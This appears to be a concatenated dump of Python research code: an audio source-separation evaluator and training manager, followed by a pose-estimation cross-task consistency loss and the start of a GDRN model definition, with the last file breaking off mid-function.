The masks received in argument have the shape of the output of the MaskModel. In this function,
these masks will first be converted to the shape of the mixture energy spectrogram (inverse Mel scaling)
and then be directly applied to the mixture spectrogram.
Args:
masks (torch.tensor): Shape: [n_class, ~freq, ~time] The masks produced by the separation model
features_shape (torch.tensor.shape): Shape of the input features to the separation model.
mixture_spectrogram (np.ndarray): shape: [Frequency, Time] Mixture spectrogram.
Returns:
Spectrogram of the sources separated by the masks. shape: [n_sources, channel=1, Frequency, Time]
"""
# resize the masks to the size of the features (shape: [n_masks, channel, freq, time]
# This does something only if the masks have different shape than features (if MaskModel doesn't preserve shape)
masks = torch.nn.functional.interpolate(masks.unsqueeze(1),
size=(features_shape[1], features_shape[2]),
mode='bilinear',
align_corners=False)
# If Mel spectrogram were used as features: reverse Mel-scaling
# Here we use the same inverse processing as in the implementation of
# <NAME> et al. "A joint-separation-classification model for sound event detection of weakly-labelled
# data"; In: CoRR abs/1711.03037 (2017). axXiv: 1711.03037 URL: http://arxiv.org/abs/1711.03037
if self.config['feature_type'] != 'spectrogram':
masks = np.asarray([np.transpose(
self.data_set.mel_filterbank / (np.sum(self.data_set.mel_filterbank, axis=0) + 1e-8)) @ mask.numpy()
for mask in masks.squeeze()])
# Apply the masks to the mixture spectrogram. Mask.shape: [n_sources, channel=1, Frequency, Time]
# mixture_spectrogram.shape: [Frequency, Time]
# output.shape: [n_sources, channel=1, Frequency, Time]
return masks * mixture_spectrogram
def spectrogram_to_audio(self, spectrogram, phase):
r"""Compute waveform from spectrogram using inverse short-time Fourier transform.
Wrapper to call the istft function from the AudioDataSet class that performs the ISTFT with the
parameters corresponding to the STFT.
Args:
spectrogram (np.ndarray): shape: [Frequency, Time]. Magnitude of STFT result
phase (np.ndarray): shape: [Frequency, Time]. Phase of STFT result
Returns:
audio waveform. (1D np.ndarray)
"""
return self.data_set.istft(spectrogram * phase)
def save_separated_audio(self, audios, filename):
r"""Save the audios tracks in audios, in a subfolder of self.config['separated_audio_folder'].
'audios' should be the sources separated by the SeparationModel for the audio mixture saved in 'filename'.
The separated tracks are saved in a folder with the same name than their corresponding mixture.
The mixture is also copied inside the folder.
Args:
audios (np.ndarray): shape: [n_sources, time]. Audio waveforms of the separated sources
filename (str): Name of the file containing the audio mixture.
"""
# Create folder with mixture name
folder_path = os.path.join(self.config["separated_audio_folder"], os.path.splitext(filename)[0])
os.makedirs(folder_path)
# Save each separated source
for class_idx, audio in enumerate(audios):
librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',
audio.T,
sr=self.data_set.config["sampling_rate"])
# Also copy the mixture in the folder
copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, "original_mix.wav"))
def separate(self, separation_method='in_lin'):
r"""Run separation with self.model for all the files in self.data_set and save the separated sources.
Args:
separation_method (str): Identifier to chose between methods for applying the masks. Chose between
separate at the feature level ('separate_spectrogram') or at the energy
spectrogram level ('separate_spectrogram_in_lin').
Advised: 'in_lin'
"""
# Check if the output folder exists, if not creates it, otherwise inform user and stop execution
if not os.path.exists(self.config["separated_audio_folder"]):
os.makedirs(self.config["separated_audio_folder"])
else:
if os.listdir(self.config["separated_audio_folder"]): # if folder is not empty
raise ValueError('Output folders already exist !')
self.model.to(self.device)
self.model.eval()
self.data_set.to(self.device)
# Loop over all the files in the dataset.
for idx in range(self.data_set.__len__()):
# Get the features
features = self.data_set.get_features(idx)
# Get the separation masks
_, masks = self.model(features.unsqueeze(0)) # (add batch dimension)
masks = masks.detach().squeeze() # move "mask" dim in first position
# Apply the masks
if separation_method == 'in_log':
spectrograms = self.separate_spectrogram(masks, features, idx)
elif separation_method == 'in_lin':
spectrograms = self.separate_spectrogram_in_lin_scale(masks, features.shape,
self.data_set.get_magnitude(idx))
else:
raise ValueError('Separation method ' + separation_method + ' is not available.')
# Get the separated audio and save
audios = [self.spectrogram_to_audio(spectrogram, self.data_set.get_phase(idx)) for spectrogram in spectrograms]
self.save_separated_audio(audios, self.data_set.filenames[idx])
def evaluate_separation(self, indices=None):
r"""Compute separation metrics using the separated sources in self.config['separated_audio_folder']
Assuming 'separate()' has been previously called: the separated sources for all the audio files in
self.data_set are stored in self.config['separated_audio_folder'].
This function loads the separated sources and the ground-truth sources to compute separation metrics.
Separation metrics used here are:
- Signal to Distortion ratio (SDR)
- Signal to Interference ratio (SIR)
- Signal to Artifact ratio (SAR)
Those are computed using the mir_eval library.
Note: These estimators are not very reliable to estimate separation quality. Unfortunately they are the
most common used in the litterature. Here we use the 'bss_eval_images' function that does use a filtered
version of the ground-truth sources, but also do not allow for scale changes.
For discussions of the measurements quality, see:
<NAME> et al. (2018). "SDR - half-baked or well done?". CoRR, abs/1811.02508.
Args:
indices (int): If passed: compute separation metrics for the file of the given indices. Otherwise: do
entire data set
Returns:
sdr, sir, sar: np.ndarray of shape [n_files, n_sources]
"""
# if indices is passed: evaluate separation for the file of the given indices. Otherwise: do entire data set
if indices is None:
indices = np.arange(self.data_set.__len__())
sdr = np.zeros((indices.shape[0], len(self.data_set.classes)))
sir = np.zeros((indices.shape[0], len(self.data_set.classes)))
sar = np.zeros((indices.shape[0], len(self.data_set.classes)))
for idx in indices:
# Load separated sources
# Take care of sorting the sources here and in data_set class in the same way to have consistent labels
# Take care not to load the 'original_mix' file which is the mixture file.
separated_sources = np.asarray([self.data_set.load_audio(os.path.join(self.config["separated_audio_folder"],
os.path.splitext(
self.data_set.filenames[idx])[0],
filename))
for filename in sorted( # sort in the same order than in data_set class
os.listdir(os.path.join(self.config["separated_audio_folder"],
os.path.splitext(self.data_set.filenames[idx])[0])))
if 'mix' not in filename]) # original mix is copied over with sep. sources
# Get the ground-truth sources from self.data_set
reference_sources = self.data_set.load_audio_source_files(idx)
# Crop to length of reconstructed signal (because last non-complete frame of the stft is dropped)
# Add small offset to avoid having sources always 0 (mir_eval does not like that)
reference_sources = reference_sources[:, :separated_sources.shape[1]] + 1e-15
sdr[idx], _, sir[idx], sar[idx], _ = mir_eval.separation.bss_eval_images(reference_sources,
separated_sources,
compute_permutation=False)
return sdr, sir, sar
```
#### File: 4p0pt0Z/Audio_blind_source_separation/train.py
```python
import torch
import numpy as np
import sklearn.metrics as skmetrics
import separation_model as md
import data_set as dts
import os
class TrainingManager:
r"""Implements a training and evaluation framework for the audio separation models.
This class regroups the different elements required to train a audio separation model:
- the data set (training, testing and validation)
- the model
- the optimizer
It provides methods to monitor the model training performances, easily save and re-load a model for evaluation.
"""
@classmethod
def default_config(cls):
r"""Provides a dictionary with the tunable training parameters."""
config = {
"data_set_type": "", # Identifier to pass to the dts.find_dataset_class to get the class of the data sets.
"batch_size": 32, # Size of mini-batches during training
# Number of worker to use for the data loaders.
# 0 means the loading happens in the same thread as the main program runs. This is fine if the training
# data is already loaded in RAM.
"n_loaders": 0,
"use_gpu": True,
"gpu_no": 0, # If multiple gpus are available, chose one
"metric": "", # Accuracy, F-score, MCC, etc... See available in 'compute_metric()'
"average": "weighted", # Average argument of the sklearn metrics: how to aggregate results across classes
# Some metrics only take binary input (eg accuracy: prediction need to be 1 or 0)
# Can be either a list with 1 value, in which case the same threshold is used for all classes
# or a list of values, one for each class.
"threshold": [0.5],
# Loss function to use: BCE, multilabelSoftMarginLoss, etc ... (see '__init__()')
"loss_f": "BCE",
# Weight to give to the L1 loss applied to the masks.
"l1_loss_lambda": 0.0,
# Optimizer parameters
"optimizer": "Adam",
"learning_rate": 0.0001,
"weight_decay": 0.00001,
# Learning rate scheduler parameters
"scheduler_type": "", # see '__init__' for supported scheduler types
"scheduler_step_size": 0, # Used with StepLR: number of epoch for each step
"scheduler_gamma": 0.0, # Used with stepLR, multiStepLR and reduceLROnPlateau: learning rate multiplier
"scheduler_milestones": [0.0], # Used with MultiStepLR: epoch number at which to change the learning rate
"scheduler_patience": 0, # Used with ReduceLROnPlateau: number of epochs to wait before reducing lr
"epoch_idx": 0, # Stores the current epoch number
"n_epochs": 0, # Number of epoch to train
"test_every": 1, # Evaluate model with an epoch on test set every this amount of training epoch
"save_path": "", # path to save the model and manager settings into a checkpoint file.
"checkpoint_path": "" # When evaluating a saved model: path to the checkpoint.
}
return config
def __init__(self, config):
r"""Constructor. Instantiates the data sets, the model, the optimizer, scheduler, loss function.
Args:
config (dict): Configuration dictionary with tunable training parameters
"""
self.config = dict(config)
self.device = torch.device("cpu") if not self.config["use_gpu"] \
else torch.device("cuda:" + str(self.config["gpu_no"]))
# Instantiate the data sets.
self.train_set, self.test_set, self.val_set = \
dts.find_data_set_class(self.config["data_set_type"]).split(self.config)
# Scale the features
self.shift_scale_data_sets()
# Instantiate the model
self.model = md.SeparationModel(config, self.train_set.features_shape(), self.train_set.n_classes())
# Optimizer
if self.config["optimizer"] == "Adam":
self.optimizer = torch.optim.Adam(self.model.parameters(),
lr=self.config["learning_rate"],
weight_decay=self.config["weight_decay"])
else:
raise NotImplementedError('The optimizer ' + self.config["optimizer"] + ' is not available.')
# Learning rate scheduler
if self.config["scheduler_type"] == "stepLR":
# Reduce lr after every step_size number of epoch
self.scheduler = torch.optim.lr_scheduler.StepLR(optimizer=self.optimizer,
step_size=self.config["scheduler_step_size"],
gamma=self.config["scheduler_gamma"])
elif self.config["scheduler_type"] == "multiStepLR":
# Reduce the learning rate when the epochs in milestones are reached
self.scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer=self.optimizer,
milestones=self.config["scheduler_milestones"],
gamma=self.config["scheduler_gamma"])
elif self.config["scheduler_type"] == "reduceLROnPlateau":
# Reduce learning rate if the loss value does not decrease during 'patience' number of epoch
self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=self.optimizer,
patience=self.config["scheduler_patience"],
factor=self.config["scheduler_gamma"])
elif not self.config["scheduler_type"]:
# Do not use any scheduler
self.scheduler = None
else:
raise NotImplementedError("Learning rate scheduler " + self.config["scheduler_type"] + " is not available.")
# Loss function
if self.config["loss_f"] == "BCE":
self.loss_f = torch.nn.BCELoss()
elif self.config["loss_f"] == "MultiLabelSoftMarginLoss":
self.loss_f = torch.nn.MultiLabelSoftMarginLoss()
else:
raise NotImplementedError("Loss function " + self.config["loss_f"] + " is not available.")
# l1 loss function, to penalize masks activations when they should be 0.
self.l1_loss_f = torch.nn.L1Loss()
self.l1_loss_lambda = self.config["l1_loss_lambda"]
# list storing loss function and metric values for each epoch
self.train_losses, self.test_losses, self.val_losses = [], [], []
self.train_metrics, self.test_metrics, self.val_metrics = [], [], []
# List to save the trainable pcen parameters at each epoch (if any)
self.pcen_parameters = []
def save_state(self):
r"""Saves the model, training metrics and losses, trainable PCEN parameters and configuration to checkpoint.
Loading this checkpoint should be enough to resume the training or evaluate the model, or investigate
training behaviour of PCEN parameters.
"""
state = {"model_state_dict": self.model.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"config": self.config,
"train_losses": self.train_losses, "train_metrics": self.train_metrics,
"test_losses": self.test_losses, "test_metrics": self.test_metrics,
"val_losses": self.val_losses, "val_metrics": self.val_losses,
"pcen_parameters": self.pcen_parameters}
torch.save(state, self.config["save_path"])
def save_metrics_and_losses(self):
r"""Save the training metrics and PCEN parameters to checkpoint, but do not over-write the saved model."""
try:
state = torch.load(self.config["save_path"], 'cpu')
except FileNotFoundError:
print("Could not find saved model, saving metrics and losses ...")
state = {}
state["train_losses"], state["test_losses"], state["val_losses"] = \
self.train_losses, self.test_losses, self.val_losses
state["train_metrics"], state["test_metrics"], state["val_metrics"] = \
self.train_metrics, self.test_metrics, self.val_metrics
state["pcen_parameters"] = self.pcen_parameters # .detach().clone()
torch.save(state, self.config["save_path"])
@classmethod
def from_checkpoint(cls, filename, config_update=None):
r"""Build a training manager from checkpoint
Build a training manager with its data sets and model from checkpoint. This allows to continue training
of a model, or evaluate a saved model.
Args:
filename (str): path to the checkpoint file
config_update (dict): Eventually, the training parameters can be updated when resuming training.
Returns:
TrainingManager with model loaded from checkpoint.
"""
if not os.path.isfile(filename):
raise ValueError("File " + filename + " is not a valid file.")
print("Loading from checkpoint '{}'".format(filename))
# Load the checkpoint dictionary
state = torch.load(filename, 'cpu')
if config_update is not None: # Update dict if we have updated parameters
state["config"].update(config_update)
# Instantiate manager
manager = cls(state["config"])
# Load saved losses and metrics
manager.train_losses, manager.test_losses, manager.val_losses = \
state["train_losses"], state["test_losses"], state["val_losses"]
manager.train_metrics, manager.test_metrics, manager.val_metrics = \
state["train_metrics"], state["test_metrics"], state["val_metrics"]
# Load model parameters
manager.model.load_state_dict(state["model_state_dict"])
# Load optimizer parameters.
manager.optimizer.load_state_dict(state["optimizer_state_dict"])
# Move model and optimizer to device
manager.model.to(manager.device)
for state in manager.optimizer.state.values(): # due to pytorch bug, need to loop manually for optimizer params
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.to(manager.device)
return manager
def shift_scale_data_sets(self):
r"""Shift and scale the features of all sets with statistics computed on the training set."""
shift, scaling = self.train_set.compute_shift_and_scaling()
# Shift and scaling parameters are saved inside the config. We might need them.
self.config["shift"], self.config["scaling"] = shift, scaling
self.train_set.shift_and_scale(shift, scaling)
self.test_set.shift_and_scale(shift, scaling)
self.val_set.shift_and_scale(shift, scaling)
def compute_metric(self, labels, predictions, average=None):
r"""Compute a classification metric score.
Args:
labels (np.ndarray): Groundtruth labels
predictions (np.ndarray): Models predictions
average (str): sklearn 'average' argument: how to aggregate the metric score accros classes
If the parameter is not passed: will use the value in self.config
Returns:
metric value
"""
if average is None:
average = self.config["average"] if self.config["average"].lower() != "none" else None
# If metric is "area under curve" based, no need for threshold. Compute metric
if self.config["metric"] == "roc_auc_score":
return skmetrics.roc_auc_score(labels, predictions, average=average)
else:
# Apply threshold:
# Only 1 threshold available: use the same for all classes
if len(self.config["threshold"]) == 1:
predictions[predictions >= self.config["threshold"][0]] = 1
predictions[predictions < self.config["threshold"][0]] = 0
# Several threshold are passed, but not the same number as the number of classes: raise Error
elif len(self.config["threshold"]) != predictions.shape[1]:
raise ValueError(
"Number of thresholds {}".format(len(self.config["threshold"])) + " and classes {}".format(
predictions.shape[0]) + "are not matching.")
# Several threshold are passed: use each threshold for each class
else:
for idx in range(len(self.config["threshold"])):
predictions[:, idx][predictions[:, idx] >= self.config["threshold"][idx]] = 1
predictions[:, idx][predictions[:, idx] < self.config["threshold"][idx]] = 0
# Compute metric
if self.config["metric"] == "accuracy":
return skmetrics.accuracy_score(labels, predictions)
elif self.config["metric"] == "f1-score":
return skmetrics.f1_score(labels, predictions, average=average)
elif self.config["metric"] == "matthews_corrcoef":
return skmetrics.matthews_corrcoef(labels, predictions)
elif self.config["metric"] == "precision":
return skmetrics.precision_score(labels, predictions, average=average)
elif self.config["metric"] == "average_precision_score":
return skmetrics.average_precision_score(labels, predictions, average=average)
elif self.config["metric"] == "recall":
return skmetrics.recall_score(labels, predictions, average=average)
def print_epoch(self, loss_value, metric_value, set_type, epoch_idx="\b"):
r"""Pretty print of the loss and metric value per epoch
Args:
loss_value (float): Loss function value
metric_value (float): Metric value
set_type (str): 'Training', 'Testing' or 'Validation'
epoch_idx (int): Number of epoch since the begining of training
"""
print("Epoch {} on {} set - ".format(epoch_idx, set_type) + self.config["loss_f"]
+ " loss: {:.4f} - ".format(loss_value), end='', flush=True)
if self.config["average"] != "None":
print(self.config["average"] + " ", end='', flush=True)
print(self.config["metric"] + ": ", end='', flush=True)
if isinstance(metric_value, np.ndarray):
print(["{:.4f}".format(value) for value in metric_value], flush=True)
else:
print(": {:.4f}".format(metric_value), flush=True)
def train(self):
r"""Training loop"""
# Move stuff to where it should be and make sure that the returned batches are on 'self.device'
self.model.to(self.device)
self.train_set.to(self.device)
# Pass the data set to the torch.data.DataLoader wrapper (for shuffling, and potentially parallel execution)
train_loader = torch.utils.data.DataLoader(self.train_set, batch_size=self.config["batch_size"], shuffle=True,
num_workers=self.config["n_loaders"])
max_metric = -np.inf # Record best metric on the testing set
self.save_metrics_and_losses()
for idx in range(1, self.config["n_epochs"] + 1): # Loop over the training epochs
self.config["epoch_idx"] += 1
# Keep all predictions, label and loses of the processed example per epoch to compute average per epoch.
all_predictions = []
all_labels = []
losses = []
self.model.train()
for batch_idx, (features, labels) in enumerate(train_loader): # Loop over the batches in the epoch
self.optimizer.zero_grad()
predictions, masks = self.model(features)
loss = self.loss_f(predictions, labels) # Classification loss
# L1 loss on the mask activation, to penalize the activations in a mask when the class was not present.
l1_loss = self.l1_loss_f(masks[1 - labels.to(torch.uint8)],
torch.zeros(masks[1 - labels.to(torch.uint8)].shape).to(masks))
# Take linear combination of the 2 losses for updating the weights
((1 - self.l1_loss_lambda) * loss + self.l1_loss_lambda * l1_loss).backward()
self.optimizer.step()
all_predictions.append(predictions.detach().cpu().numpy())
all_labels.append(labels.detach().cpu().numpy())
losses.append(((1 - self.l1_loss_lambda) * loss + self.l1_loss_lambda * l1_loss).item())
# End of epoch on training set.
if self.config["scheduler_type"] == "ReduceLROnPlateau":
self.scheduler.step(np.mean(losses))
elif self.scheduler is not None:
self.scheduler.step()
# Compute epoch averages
all_predictions = np.concatenate(all_predictions, axis=0) # list of values to 1D array
all_labels = np.concatenate(all_labels, axis=0)
self.train_losses.append(np.mean(losses))
self.train_metrics.append(self.compute_metric(all_labels, all_predictions))
self.print_epoch(loss_value=self.train_losses[-1], metric_value=self.train_metrics[-1],
set_type="training", epoch_idx=self.config["epoch_idx"])
# Save the trainable PCEN parameters (if any)
if hasattr(self.model, 'pcen'):
if self.model.pcen is not None:
self.pcen_parameters.append({key: torch.tensor(value, requires_grad=False)
for key, value in self.model.pcen.state_dict().items()})
# Monitor performances on testing set every once in a while. If best score is achieved: save model
if idx % self.config["test_every"] == 0:
test_loss, test_metric, weighted_test_metric = self.evaluate(self.test_set, special_average='weighted')
self.test_losses.append(test_loss)
self.test_metrics.append(test_metric)
self.print_epoch(loss_value=test_loss, metric_value=test_metric, set_type="testing")
if weighted_test_metric > max_metric: # in case of metrics per class, take mean
print("Saving best model...")
self.save_state()
max_metric = test_metric
print("Loading best model for evaluation on validation set... ")
state = torch.load(self.config["save_path"], 'cpu')
self.model.load_state_dict(state["model_state_dict"])
self.model.to(self.device)
val_loss, val_metric = self.evaluate(self.val_set)
self.val_losses.append(val_loss)
self.val_metrics.append(val_metric)
self.print_epoch(loss_value=val_loss, metric_value=val_metric, set_type="validation")
self.save_metrics_and_losses()
# In case the metric was not a good indicator and we still would like to save the last epoch model.
print("Saving model at last epoch...")
self.config['save_path'] = os.path.splitext(os.path.basename(self.config['save_path']))[0] + '_final' + '.ckpt'
self.save_state()
# Put back save path
self.config['save_path'] = os.path.splitext(os.path.basename(self.config['save_path']))[0][:-6] + 'ckpt'
def evaluate(self, data_set, special_average=None):
r"""Run the model through an epoch of a dataset, to compute loss function and metric averages.
Args:
data_set (torch.data.Dataset): Dataset to evaluate the model
special_average (str): sklearn 'average' argument: how to aggregate the metric score accros classes
The metric score is computed using the 'average' parameter in self.config - and
also using this special average.
This is used in the training loop: In order to know if the model performs best
over-all, a single number metric score needs to be calculated even if the
monitored metric is computed per class.
Returns:
(Average loss, Average score) on the input data set.
(Average loss, Average score, Weighted average score) on the input data set.
"""
# Move model and data set to device
self.model.to(self.device)
data_loader = torch.utils.data.DataLoader(data_set, batch_size=self.config["batch_size"], shuffle=True,
num_workers=self.config["n_loaders"])
data_loader.dataset.to(self.device)
# List to aggregate the loss and metric values over the batches
all_predictions = []
all_labels = []
losses = []
self.model.eval()
with torch.no_grad():
for (features, labels) in data_loader: # Loop over the batches in the epoch
predictions, masks = self.model(features)
loss = self.loss_f(predictions, labels)
losses.append(loss.item())
all_predictions.append(predictions.detach().cpu().numpy())
all_labels.append(labels.detach().cpu().numpy())
all_predictions = np.concatenate(all_predictions, axis=0) # list of arrays to 1D array
all_labels = np.concatenate(all_labels, axis=0)
if special_average is None:
return np.mean(losses), self.compute_metric(all_labels, all_predictions)
else:
return np.mean(losses), \
self.compute_metric(all_labels, all_predictions), \
self.compute_metric(all_labels, all_predictions, special_average)
``` |
{
"source": "4PiR2/SO-Pose",
"score": 2
} |
#### File: gdrn_selfocc_modeling/losses/crosstask_loss.py
```python
import sys
import os.path as osp
from functools import partial
import torch
import torch.nn as nn
import torch.nn.functional as F
from core.utils.pose_utils import quat2mat_torch
from .l2_loss import L2Loss
from fvcore.nn import smooth_l1_loss
from lib.utils.utils import dprint
from core.utils.pose_utils import get_closest_rot_batch
import logging
from detectron2.utils.logger import log_first_n
from lib.pysixd.misc import transform_pts_batch
logger = logging.getLogger(__name__)
class CT_loss(nn.Module):
def __init__(self,
loss_type="L2",
loss_weight=1.0
):
super().__init__()
self.loss_type = "L1"
self.loss_weight = 1.0
def forward(self, pred_rots, pred_P0, pred_Q0, gt_occmask, roi_extent, pred_transes=None):
"""
pred_rots: [B, 3, 3]
gt_rots: [B, 3, 3] or [B, 4]
gt_occmask: [B, 3, h, w]
pred_p0 : [B, c, h, w]
pred_transes: [B, 3]
gt_transes: [B, 3]
extents: [B, 3]
roi_extent : [B, 3] # 用于把缩放的尺度还原回去
stores K rotations regarding symmetries, if not symmetric, None
"""
b, c, h, w = pred_P0.shape
if pred_rots.shape[-1] == 4:
pred_rots = quat2mat_torch(pred_rots)
# 计算cross task consistency
'''
(Rn)^Tt (RP0+t) = (Rn)^T(RP0+t) (RQ0+t)
'''
# 需要把P0, Q0还原到原来的大小,之前是做了归一化的
denormalize_P0 = (pred_P0-0.5) * (roi_extent.repeat(h, w, 1, 1).permute(2, 3, 0, 1))
roi_p0_x = denormalize_P0[:, 0, :, :] # B, h, w
roi_p0_y = denormalize_P0[:, 1, :, :]
roi_p0_z = denormalize_P0[:, 2, :, :]
roi_p0 = torch.stack([roi_p0_x, roi_p0_y, roi_p0_z], dim=1) # B, 3, h, w
# 处理Q0
roi_extent_q0 = torch.stack([roi_extent[:, 1],
roi_extent[:, 2],
roi_extent[:, 0],
roi_extent[:, 2],
roi_extent[:, 0],
roi_extent[:, 1]], dim=1)
denormalize_Q0 = (pred_Q0-0.5) * (roi_extent_q0.repeat(h, w, 1, 1).permute(2, 3, 0, 1))
roi_q0_xy_x = denormalize_Q0[:, 0, :, :]
roi_q0_xy_y = denormalize_Q0[:, 1, :, :]
roi_q0_xz_x = denormalize_Q0[:, 2, :, :]
roi_q0_xz_z = denormalize_Q0[:, 3, :, :]
roi_q0_yz_y = denormalize_Q0[:, 4, :, :]
roi_q0_yz_z = denormalize_Q0[:, 5, :, :]
roi_q0_x = torch.stack([torch.zeros([b, h, w], dtype=torch.float).cuda(), roi_q0_xy_x, roi_q0_xy_y],
dim=1) # n=(1,0,0) # [b, 3, h, w]
roi_q0_y = torch.stack([roi_q0_xz_x, torch.zeros([b, h, w], dtype=torch.float).cuda(), roi_q0_xz_z], dim=1)
roi_q0_z = torch.stack([roi_q0_yz_y, roi_q0_yz_z, torch.zeros([b, h, w], dtype=torch.float).cuda()], dim=1)
# the following four lines are only used for test
'''
roi_p0 = pred_P0
roi_q0_x = pred_Q0[:, 0:2, :, :]
roi_q0_y = pred_Q0[:, 2:4, :, :]
roi_q0_z = pred_Q0[:, 4:, :, :]
'''
# 可以开始计算了
RTt = (torch.bmm(pred_rots.permute(0, 2, 1), pred_transes.view(b, 3, 1))).squeeze() # b, 3
# 将RTt扩展到和points一样的数量,变成b, 3, n
RTtn = RTt.repeat(h * w, 1, 1).permute(1, 2, 0) # 这里n是所有点
t_trans = pred_transes.view(b, 3).repeat(h * w, 1, 1).permute(1, 2, 0)
RP0t = torch.bmm(pred_rots, roi_p0.view(b, 3, -1)) + t_trans # b, 3, n, Rp0+t
# RP0t_norm = torch.norm(RP0t, p=2, dim=1, keepdim=False) # b, n
RQ0t1 = torch.bmm(pred_rots, roi_q0_x.view(b, 3, -1)) + t_trans # b, 3, n
# RQ0t1_norm = torch.norm(RQ0t1, p=2, dim=2, keepdim=False) # b, n
RQ0t2 = torch.bmm(pred_rots, roi_q0_y.view(b, 3, -1)) + t_trans # b, 3, n
# RQ0t2_norm = torch.norm(RQ0t2, p=2, dim=2, keepdim=False)
RQ0t3 = torch.bmm(pred_rots, roi_q0_z.view(b, 3, -1)) + t_trans # b, 3, n
# RQ0t3_norm = torch.norm(RQ0t3, p=2, dim=2, keepdim=False)
# 开始计算loss
# 针对于n=(1,0,0)的loss
loss_x = RTtn[:, 0:1, :].repeat(1, 3, 1) * RP0t - \
(torch.bmm(pred_rots[:, :, 0:1].permute(0, 2, 1), RP0t)).repeat(1, 3, 1) * RQ0t1 # 得到b, 3, n
loss_x = torch.norm(loss_x, dim=1) # b, n
# b, n * b, n---b, n * b, n n-h*w
# 用occmask选择需要计算的点 b,h,w -->b,n
occmask_x = gt_occmask[:, 0, :, :].view(b, -1)
loss_x = loss_x * occmask_x # b,n
if occmask_x.sum() < b * 3: # 整个batch
loss_x = 0
else:
loss_x = loss_x.sum() # 取均值
# 针对于n=(0,1,0)的loss
loss_y = RTtn[:, 1:2, :].repeat(1, 3, 1) * RP0t - \
(torch.bmm(pred_rots[:, :, 1:2].permute(0, 2, 1), RP0t)).repeat(1, 3, 1) * RQ0t2 # 得到b, 3, n
loss_y = torch.norm(loss_y, dim=1)
# b, n * b, n---b, n * b, n n-h*w
# 用occmask选择需要计算的点 b,h,w -->b,n
occmask_y = gt_occmask[:, 1, :, :].view(b, -1)
loss_y = loss_y * occmask_y # b,n
if occmask_y.sum() < b * 3: # 整个batch
loss_y = 0
else:
loss_y = loss_y.sum() # 取均值
# 针对于n=(0,0,1)的loss
loss_z = RTtn[:, 2:, :].repeat(1, 3, 1) * RP0t - \
(torch.bmm(pred_rots[:, :, 2:].permute(0, 2, 1), RP0t)).repeat(1, 3, 1) * RQ0t3 # 得到b, 3, n
loss_z = torch.norm(loss_z, dim=1)
# b, n * b, n---b, n * b, n n-h*w
# 用occmask选择需要计算的点 b,h,w -->b,n
occmask_z = gt_occmask[:, 2, :, :].view(b, -1)
loss_z = loss_z * occmask_z # b,n
if occmask_z.sum() < b * 3: # 整个batch
loss_z = 0
else:
loss_z = loss_z.sum() # 取均值
# 最终的loss
loss = (loss_x + loss_y + loss_z)/gt_occmask.sum().float().clamp(min=1.0)
return loss
```
#### File: gdrn_selfocc_modeling/models/GDRN_no_region.py
```python
import copy
import logging
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from core.utils.solver_utils import build_optimizer_with_params
from detectron2.utils.events import get_event_storage
from mmcv.runner import load_checkpoint
from ..losses.coor_cross_entropy import CrossEntropyHeatmapLoss
from ..losses.l2_loss import L2Loss
from ..losses.pm_loss import PyPMLoss
from ..losses.rot_loss import angular_distance, rot_l2_loss
from .model_utils import (
compute_mean_re_te,
get_neck,
get_geo_head,
get_mask_prob,
get_pnp_net_no_region,
get_rot_mat,
get_xyz_mask_out_dim,
)
from .pose_from_pred import pose_from_pred
from .pose_from_pred_centroid_z import pose_from_pred_centroid_z
from .pose_from_pred_centroid_z_abs import pose_from_pred_centroid_z_abs
from .net_factory import BACKBONES
logger = logging.getLogger(__name__)
class GDRN_NoRegion(nn.Module):
def __init__(self, cfg, backbone, geo_head_net, neck=None, pnp_net=None):
super().__init__()
assert cfg.MODEL.POSE_NET.NAME == "GDRN_no_region", cfg.MODEL.POSE_NET.NAME
self.backbone = backbone
self.neck = neck
self.geo_head_net = geo_head_net
self.pnp_net = pnp_net
self.cfg = cfg
self.xyz_out_dim, self.mask_out_dim = get_xyz_mask_out_dim(cfg)
# uncertainty multi-task loss weighting
# https://github.com/Hui-Li/multi-task-learning-example-PyTorch/blob/master/multi-task-learning-example-PyTorch.ipynb
# a = log(sigma^2)
# L*exp(-a) + a or L*exp(-a) + log(1+exp(a))
# self.log_vars = nn.Parameter(torch.tensor([0, 0], requires_grad=True, dtype=torch.float32).cuda())
# yapf: disable
if cfg.MODEL.POSE_NET.USE_MTL:
self.loss_names = [
"mask", "coor_x", "coor_y", "coor_z", "coor_x_bin", "coor_y_bin", "coor_z_bin",
"PM_R", "PM_xy", "PM_z", "PM_xy_noP", "PM_z_noP", "PM_T", "PM_T_noP",
"centroid", "z", "trans_xy", "trans_z", "trans_LPnP", "rot", "bind",
]
for loss_name in self.loss_names:
self.register_parameter(
f"log_var_{loss_name}", nn.Parameter(torch.tensor([0.0], requires_grad=True, dtype=torch.float32))
)
# yapf: enable
def forward(
self,
x,
gt_xyz=None,
gt_xyz_bin=None,
gt_mask_trunc=None,
gt_mask_visib=None,
gt_mask_obj=None,
gt_region=None,
gt_ego_rot=None,
gt_points=None,
sym_infos=None,
gt_trans=None,
gt_trans_ratio=None,
roi_classes=None,
roi_coord_2d=None,
roi_cams=None,
roi_centers=None,
roi_whs=None,
roi_extents=None,
resize_ratios=None,
do_loss=False,
):
cfg = self.cfg
net_cfg = cfg.MODEL.POSE_NET
g_head_cfg = net_cfg.GEO_HEAD
pnp_net_cfg = net_cfg.PNP_NET
device = x.device
bs = x.shape[0]
num_classes = net_cfg.NUM_CLASSES
out_res = net_cfg.OUTPUT_RES
# x.shape [bs, 3, 256, 256]
conv_feat = self.backbone(x) # [bs, c, 8, 8]
if self.neck is not None:
conv_feat = self.neck(conv_feat)
mask, coor_x, coor_y, coor_z = self.geo_head_net(conv_feat)
if g_head_cfg.XYZ_CLASS_AWARE:
assert roi_classes is not None
coor_x = coor_x.view(bs, num_classes, self.xyz_out_dim // 3, out_res, out_res)
coor_x = coor_x[torch.arange(bs).to(device), roi_classes]
coor_y = coor_y.view(bs, num_classes, self.xyz_out_dim // 3, out_res, out_res)
coor_y = coor_y[torch.arange(bs).to(device), roi_classes]
coor_z = coor_z.view(bs, num_classes, self.xyz_out_dim // 3, out_res, out_res)
coor_z = coor_z[torch.arange(bs).to(device), roi_classes]
if g_head_cfg.MASK_CLASS_AWARE:
